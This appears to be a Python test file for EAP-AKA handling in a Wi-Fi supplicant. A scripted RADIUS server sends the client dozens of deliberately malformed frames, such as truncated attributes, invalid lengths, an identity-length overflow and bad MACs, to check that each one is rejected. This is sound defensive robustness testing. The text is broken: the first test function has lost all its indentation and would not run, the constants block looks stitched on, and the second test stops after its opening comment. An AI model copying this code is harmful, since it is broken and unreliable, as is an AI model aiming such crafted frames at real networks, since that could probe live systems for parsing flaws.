# EAP-SIM / EAP-AKA protocol constants used by the crafted test frames
# below (presumably matching RFC 4186 / RFC 4187 — values are taken
# as-is from the implementation under test).

# EAP-SIM message subtypes
EAP_SIM_SUBTYPE_START = 10
EAP_SIM_SUBTYPE_CHALLENGE = 11
EAP_SIM_SUBTYPE_NOTIFICATION = 12
EAP_SIM_SUBTYPE_REAUTHENTICATION = 13
EAP_SIM_SUBTYPE_CLIENT_ERROR = 14

# EAP-AKA message subtypes
EAP_AKA_SUBTYPE_CHALLENGE = 1
EAP_AKA_SUBTYPE_AUTHENTICATION_REJECT = 2
EAP_AKA_SUBTYPE_SYNCHRONIZATION_FAILURE = 4
EAP_AKA_SUBTYPE_IDENTITY = 5
EAP_AKA_SUBTYPE_NOTIFICATION = 12
EAP_AKA_SUBTYPE_REAUTHENTICATION = 13
EAP_AKA_SUBTYPE_CLIENT_ERROR = 14

# Attribute type values shared by EAP-SIM and EAP-AKA messages
# (values >= 128 are the skippable/encrypted-data range)
EAP_SIM_AT_RAND = 1
EAP_SIM_AT_AUTN = 2
EAP_SIM_AT_RES = 3
EAP_SIM_AT_AUTS = 4
EAP_SIM_AT_PADDING = 6
EAP_SIM_AT_NONCE_MT = 7
EAP_SIM_AT_PERMANENT_ID_REQ = 10
EAP_SIM_AT_MAC = 11
EAP_SIM_AT_NOTIFICATION = 12
EAP_SIM_AT_ANY_ID_REQ = 13
EAP_SIM_AT_IDENTITY = 14
EAP_SIM_AT_VERSION_LIST = 15
EAP_SIM_AT_SELECTED_VERSION = 16
EAP_SIM_AT_FULLAUTH_ID_REQ = 17
EAP_SIM_AT_COUNTER = 19
EAP_SIM_AT_COUNTER_TOO_SMALL = 20
EAP_SIM_AT_NONCE_S = 21
EAP_SIM_AT_CLIENT_ERROR_CODE = 22
EAP_SIM_AT_KDF_INPUT = 23
EAP_SIM_AT_KDF = 24
EAP_SIM_AT_IV = 129
EAP_SIM_AT_ENCR_DATA = 130
EAP_SIM_AT_NEXT_PSEUDONYM = 132
EAP_SIM_AT_NEXT_REAUTH_ID = 133
EAP_SIM_AT_CHECKCODE = 134
EAP_SIM_AT_RESULT_IND = 135
EAP_SIM_AT_BIDDING = 136
def test_eap_proto_aka(dev, apdev):
"""EAP-AKA protocol tests"""
def aka_handler(ctx, req):
logger.info("aka_handler - RX " + req.encode("hex"))
if 'num' not in ctx:
ctx['num'] = 0
ctx['num'] = ctx['num'] + 1
if 'id' not in ctx:
ctx['id'] = 1
ctx['id'] = (ctx['id'] + 1) % 256
idx = 0
idx += 1
if ctx['num'] == idx:
logger.info("Test: Missing payload")
return struct.pack(">BBHB", EAP_CODE_REQUEST, ctx['id'],
4 + 1,
EAP_TYPE_AKA)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Unknown subtype")
return struct.pack(">BBHBBH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3,
EAP_TYPE_AKA, 255, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Client Error")
return struct.pack(">BBHBBH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3,
EAP_TYPE_AKA, EAP_AKA_SUBTYPE_CLIENT_ERROR, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Too short attribute header")
return struct.pack(">BBHBBHB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + 3,
EAP_TYPE_AKA, EAP_AKA_SUBTYPE_IDENTITY, 0, 255)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Truncated attribute")
return struct.pack(">BBHBBHBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + 4,
EAP_TYPE_AKA, EAP_AKA_SUBTYPE_IDENTITY, 0, 255,
255)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Too short attribute data")
return struct.pack(">BBHBBHBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + 4,
EAP_TYPE_AKA, EAP_AKA_SUBTYPE_IDENTITY, 0, 255,
0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Skippable/non-skippable unrecognzized attribute")
return struct.pack(">BBHBBHBBHBBH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + 10,
EAP_TYPE_AKA, EAP_AKA_SUBTYPE_IDENTITY, 0,
255, 1, 0, 127, 1, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Identity request without ID type")
return struct.pack(">BBHBBH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3,
EAP_TYPE_AKA, EAP_AKA_SUBTYPE_IDENTITY, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Identity request ANY_ID")
return struct.pack(">BBHBBHBBH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 4,
EAP_TYPE_AKA, EAP_AKA_SUBTYPE_IDENTITY, 0,
EAP_SIM_AT_ANY_ID_REQ, 1, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Identity request ANY_ID (duplicate)")
return struct.pack(">BBHBBHBBH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 4,
EAP_TYPE_AKA, EAP_AKA_SUBTYPE_IDENTITY, 0,
EAP_SIM_AT_ANY_ID_REQ, 1, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Identity request ANY_ID")
return struct.pack(">BBHBBHBBH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 4,
EAP_TYPE_AKA, EAP_AKA_SUBTYPE_IDENTITY, 0,
EAP_SIM_AT_ANY_ID_REQ, 1, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Identity request FULLAUTH_ID")
return struct.pack(">BBHBBHBBH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 4,
EAP_TYPE_AKA, EAP_AKA_SUBTYPE_IDENTITY, 0,
EAP_SIM_AT_FULLAUTH_ID_REQ, 1, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Identity request FULLAUTH_ID (duplicate)")
return struct.pack(">BBHBBHBBH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 4,
EAP_TYPE_AKA, EAP_AKA_SUBTYPE_IDENTITY, 0,
EAP_SIM_AT_FULLAUTH_ID_REQ, 1, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Identity request ANY_ID")
return struct.pack(">BBHBBHBBH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 4,
EAP_TYPE_AKA, EAP_AKA_SUBTYPE_IDENTITY, 0,
EAP_SIM_AT_ANY_ID_REQ, 1, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Identity request FULLAUTH_ID")
return struct.pack(">BBHBBHBBH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 4,
EAP_TYPE_AKA, EAP_AKA_SUBTYPE_IDENTITY, 0,
EAP_SIM_AT_FULLAUTH_ID_REQ, 1, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Identity request PERMANENT_ID")
return struct.pack(">BBHBBHBBH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 4,
EAP_TYPE_AKA, EAP_AKA_SUBTYPE_IDENTITY, 0,
EAP_SIM_AT_PERMANENT_ID_REQ, 1, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Identity request PERMANENT_ID (duplicate)")
return struct.pack(">BBHBBHBBH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 4,
EAP_TYPE_AKA, EAP_AKA_SUBTYPE_IDENTITY, 0,
EAP_SIM_AT_PERMANENT_ID_REQ, 1, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Challenge with no attributes")
return struct.pack(">BBHBBH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3,
EAP_TYPE_AKA, EAP_AKA_SUBTYPE_CHALLENGE, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: AKA Challenge with BIDDING")
return struct.pack(">BBHBBHBBH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 4,
EAP_TYPE_AKA, EAP_AKA_SUBTYPE_CHALLENGE, 0,
EAP_SIM_AT_BIDDING, 1, 0x8000)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Notification with no attributes")
return struct.pack(">BBHBBH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3,
EAP_TYPE_AKA, EAP_AKA_SUBTYPE_NOTIFICATION, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Notification indicating success, but no MAC")
return struct.pack(">BBHBBHBBH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 4,
EAP_TYPE_AKA, EAP_AKA_SUBTYPE_NOTIFICATION, 0,
EAP_SIM_AT_NOTIFICATION, 1, 32768)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Notification indicating success, but invalid MAC value")
return struct.pack(">BBHBBHBBHBBH4L", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 4 + 20,
EAP_TYPE_AKA, EAP_AKA_SUBTYPE_NOTIFICATION, 0,
EAP_SIM_AT_NOTIFICATION, 1, 32768,
EAP_SIM_AT_MAC, 5, 0, 0, 0, 0, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Notification indicating success with zero-key MAC")
return struct.pack(">BBHBBHBBHBBH16B", EAP_CODE_REQUEST,
ctx['id'] - 2,
4 + 1 + 3 + 4 + 20,
EAP_TYPE_AKA, EAP_AKA_SUBTYPE_NOTIFICATION, 0,
EAP_SIM_AT_NOTIFICATION, 1, 32768,
EAP_SIM_AT_MAC, 5, 0,
0xbe, 0x2e, 0xbb, 0xa9, 0xfa, 0x2e, 0x82, 0x36,
0x37, 0x8c, 0x32, 0x41, 0xb7, 0xc7, 0x58, 0xa3)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Success")
return struct.pack(">BBH", EAP_CODE_SUCCESS, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Notification before auth")
return struct.pack(">BBHBBHBBH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 4,
EAP_TYPE_AKA, EAP_AKA_SUBTYPE_NOTIFICATION, 0,
EAP_SIM_AT_NOTIFICATION, 1, 16384)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Notification before auth")
return struct.pack(">BBHBBHBBH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 4,
EAP_TYPE_AKA, EAP_AKA_SUBTYPE_NOTIFICATION, 0,
EAP_SIM_AT_NOTIFICATION, 1, 16385)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Notification with unrecognized non-failure")
return struct.pack(">BBHBBHBBH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 4,
EAP_TYPE_AKA, EAP_AKA_SUBTYPE_NOTIFICATION, 0,
EAP_SIM_AT_NOTIFICATION, 1, 0xc000)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Notification before auth (duplicate)")
return struct.pack(">BBHBBHBBH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 4,
EAP_TYPE_AKA, EAP_AKA_SUBTYPE_NOTIFICATION, 0,
EAP_SIM_AT_NOTIFICATION, 1, 0xc000)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Re-authentication (unexpected) with no attributes")
return struct.pack(">BBHBBH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3,
EAP_TYPE_AKA, EAP_AKA_SUBTYPE_REAUTHENTICATION,
0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: AKA Challenge with Checkcode claiming identity round was used")
return struct.pack(">BBHBBHBBH5L", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 24,
EAP_TYPE_AKA, EAP_AKA_SUBTYPE_CHALLENGE, 0,
EAP_SIM_AT_CHECKCODE, 6, 0, 0, 0, 0, 0, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Identity request ANY_ID")
return struct.pack(">BBHBBHBBH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 4,
EAP_TYPE_AKA, EAP_AKA_SUBTYPE_IDENTITY, 0,
EAP_SIM_AT_ANY_ID_REQ, 1, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: AKA Challenge with Checkcode claiming no identity round was used")
return struct.pack(">BBHBBHBBH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 4,
EAP_TYPE_AKA, EAP_AKA_SUBTYPE_CHALLENGE, 0,
EAP_SIM_AT_CHECKCODE, 1, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Identity request ANY_ID")
return struct.pack(">BBHBBHBBH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 4,
EAP_TYPE_AKA, EAP_AKA_SUBTYPE_IDENTITY, 0,
EAP_SIM_AT_ANY_ID_REQ, 1, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: AKA Challenge with mismatching Checkcode value")
return struct.pack(">BBHBBHBBH5L", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 24,
EAP_TYPE_AKA, EAP_AKA_SUBTYPE_CHALLENGE, 0,
EAP_SIM_AT_CHECKCODE, 6, 0, 0, 0, 0, 0, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Re-authentication (unexpected) with Checkcode claimin identity round was used")
return struct.pack(">BBHBBHBBH5L", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 24,
EAP_TYPE_AKA, EAP_AKA_SUBTYPE_REAUTHENTICATION,
0,
EAP_SIM_AT_CHECKCODE, 6, 0, 0, 0, 0, 0, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Invalid AT_RAND length")
return struct.pack(">BBHBBHBBH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 4,
EAP_TYPE_AKA, EAP_AKA_SUBTYPE_IDENTITY, 0,
EAP_SIM_AT_RAND, 1, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Invalid AT_AUTN length")
return struct.pack(">BBHBBHBBH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 4,
EAP_TYPE_AKA, EAP_AKA_SUBTYPE_IDENTITY, 0,
EAP_SIM_AT_AUTN, 1, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Unencrypted AT_PADDING")
return struct.pack(">BBHBBHBBH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 4,
EAP_TYPE_AKA, EAP_AKA_SUBTYPE_IDENTITY, 0,
EAP_SIM_AT_PADDING, 1, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Invalid AT_NONCE_MT length")
return struct.pack(">BBHBBHBBH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 4,
EAP_TYPE_AKA, EAP_AKA_SUBTYPE_IDENTITY, 0,
EAP_SIM_AT_NONCE_MT, 1, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Invalid AT_MAC length")
return struct.pack(">BBHBBHBBH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 4,
EAP_TYPE_AKA, EAP_AKA_SUBTYPE_IDENTITY, 0,
EAP_SIM_AT_MAC, 1, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Invalid AT_NOTIFICATION length")
return struct.pack(">BBHBBHBBHL", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 8,
EAP_TYPE_AKA, EAP_AKA_SUBTYPE_IDENTITY, 0,
EAP_SIM_AT_NOTIFICATION, 2, 0, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: AT_IDENTITY overflow")
return struct.pack(">BBHBBHBBH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 4,
EAP_TYPE_AKA, EAP_AKA_SUBTYPE_IDENTITY, 0,
EAP_SIM_AT_IDENTITY, 1, 0xffff)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Unexpected AT_VERSION_LIST")
return struct.pack(">BBHBBHBBH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 4,
EAP_TYPE_AKA, EAP_AKA_SUBTYPE_IDENTITY, 0,
EAP_SIM_AT_VERSION_LIST, 1, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Invalid AT_SELECTED_VERSION length")
return struct.pack(">BBHBBHBBHL", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 8,
EAP_TYPE_AKA, EAP_AKA_SUBTYPE_IDENTITY, 0,
EAP_SIM_AT_SELECTED_VERSION, 2, 0, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Unencrypted AT_COUNTER")
return struct.pack(">BBHBBHBBH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 4,
EAP_TYPE_AKA, EAP_AKA_SUBTYPE_IDENTITY, 0,
EAP_SIM_AT_COUNTER, 1, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Unencrypted AT_COUNTER_TOO_SMALL")
return struct.pack(">BBHBBHBBH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 4,
EAP_TYPE_AKA, EAP_AKA_SUBTYPE_IDENTITY, 0,
EAP_SIM_AT_COUNTER_TOO_SMALL, 1, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Unencrypted AT_NONCE_S")
return struct.pack(">BBHBBHBBH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 4,
EAP_TYPE_AKA, EAP_AKA_SUBTYPE_IDENTITY, 0,
EAP_SIM_AT_NONCE_S, 1, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Invalid AT_CLIENT_ERROR_CODE length")
return struct.pack(">BBHBBHBBHL", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 8,
EAP_TYPE_AKA, EAP_AKA_SUBTYPE_IDENTITY, 0,
EAP_SIM_AT_CLIENT_ERROR_CODE, 2, 0, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Invalid AT_IV length")
return struct.pack(">BBHBBHBBH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 4,
EAP_TYPE_AKA, EAP_AKA_SUBTYPE_IDENTITY, 0,
EAP_SIM_AT_IV, 1, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Invalid AT_ENCR_DATA length")
return struct.pack(">BBHBBHBBHL", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 8,
EAP_TYPE_AKA, EAP_AKA_SUBTYPE_IDENTITY, 0,
EAP_SIM_AT_ENCR_DATA, 2, 0, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Unencrypted AT_NEXT_PSEUDONYM")
return struct.pack(">BBHBBHBBH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 4,
EAP_TYPE_AKA, EAP_AKA_SUBTYPE_IDENTITY, 0,
EAP_SIM_AT_NEXT_PSEUDONYM, 1, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Unencrypted AT_NEXT_REAUTH_ID")
return struct.pack(">BBHBBHBBH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 4,
EAP_TYPE_AKA, EAP_AKA_SUBTYPE_IDENTITY, 0,
EAP_SIM_AT_NEXT_REAUTH_ID, 1, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Invalid AT_RES length")
return struct.pack(">BBHBBHBBH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 4,
EAP_TYPE_AKA, EAP_AKA_SUBTYPE_IDENTITY, 0,
EAP_SIM_AT_RES, 1, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Invalid AT_RES length")
return struct.pack(">BBHBBHBBH5L", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 24,
EAP_TYPE_AKA, EAP_AKA_SUBTYPE_IDENTITY, 0,
EAP_SIM_AT_RES, 6, 0xffff, 0, 0, 0, 0, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Invalid AT_AUTS length")
return struct.pack(">BBHBBHBBHL", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 8,
EAP_TYPE_AKA, EAP_AKA_SUBTYPE_IDENTITY, 0,
EAP_SIM_AT_AUTS, 2, 0, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Invalid AT_CHECKCODE length")
return struct.pack(">BBHBBHBBHL", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 8,
EAP_TYPE_AKA, EAP_AKA_SUBTYPE_IDENTITY, 0,
EAP_SIM_AT_CHECKCODE, 2, 0, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Invalid AT_RESULT_IND length")
return struct.pack(">BBHBBHBBHL", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 8,
EAP_TYPE_AKA, EAP_AKA_SUBTYPE_IDENTITY, 0,
EAP_SIM_AT_RESULT_IND, 2, 0, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Unexpected AT_KDF_INPUT")
return struct.pack(">BBHBBHBBHL", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 8,
EAP_TYPE_AKA, EAP_AKA_SUBTYPE_IDENTITY, 0,
EAP_SIM_AT_KDF_INPUT, 2, 0, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Unexpected AT_KDF")
return struct.pack(">BBHBBHBBHL", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 8,
EAP_TYPE_AKA, EAP_AKA_SUBTYPE_IDENTITY, 0,
EAP_SIM_AT_KDF, 2, 0, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Invalid AT_BIDDING length")
return struct.pack(">BBHBBHBBHL", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 8,
EAP_TYPE_AKA, EAP_AKA_SUBTYPE_IDENTITY, 0,
EAP_SIM_AT_BIDDING, 2, 0, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
return None
srv = start_radius_server(aka_handler)
try:
hapd = start_ap(apdev[0]['ifname'])
for i in range(0, 49):
eap = "AKA AKA'" if i == 11 else "AKA"
dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
eap=eap, identity="0232010000000000",
password="90dca4eda45b53cf0f12d7c9c3bc6a89:cb9cccc4b9258e6dca4760379fb82581:000000000123",
wait_connect=False)
ev = dev[0].wait_event(["CTRL-EVENT-EAP-PROPOSED-METHOD"],
timeout=15)
if ev is None:
raise Exception("Timeout on EAP start")
if i in [ 0, 15 ]:
time.sleep(0.1)
else:
ev = dev[0].wait_event(["CTRL-EVENT-EAP-FAILURE"],
timeout=10)
if ev is None:
raise Exception("Timeout on EAP failure")
dev[0].request("REMOVE_NETWORK all")
dev[0].dump_monitor()
finally:
stop_radius_server(srv)
def test_eap_proto_aka_prime(dev, apdev):
    """EAP-AKA' protocol tests"""
    # Scripted RADIUS EAP handler: every packet received from the peer
    # advances ctx['num'], which selects the next canned server message.
    # Most messages are deliberately malformed or unexpected EAP-AKA'
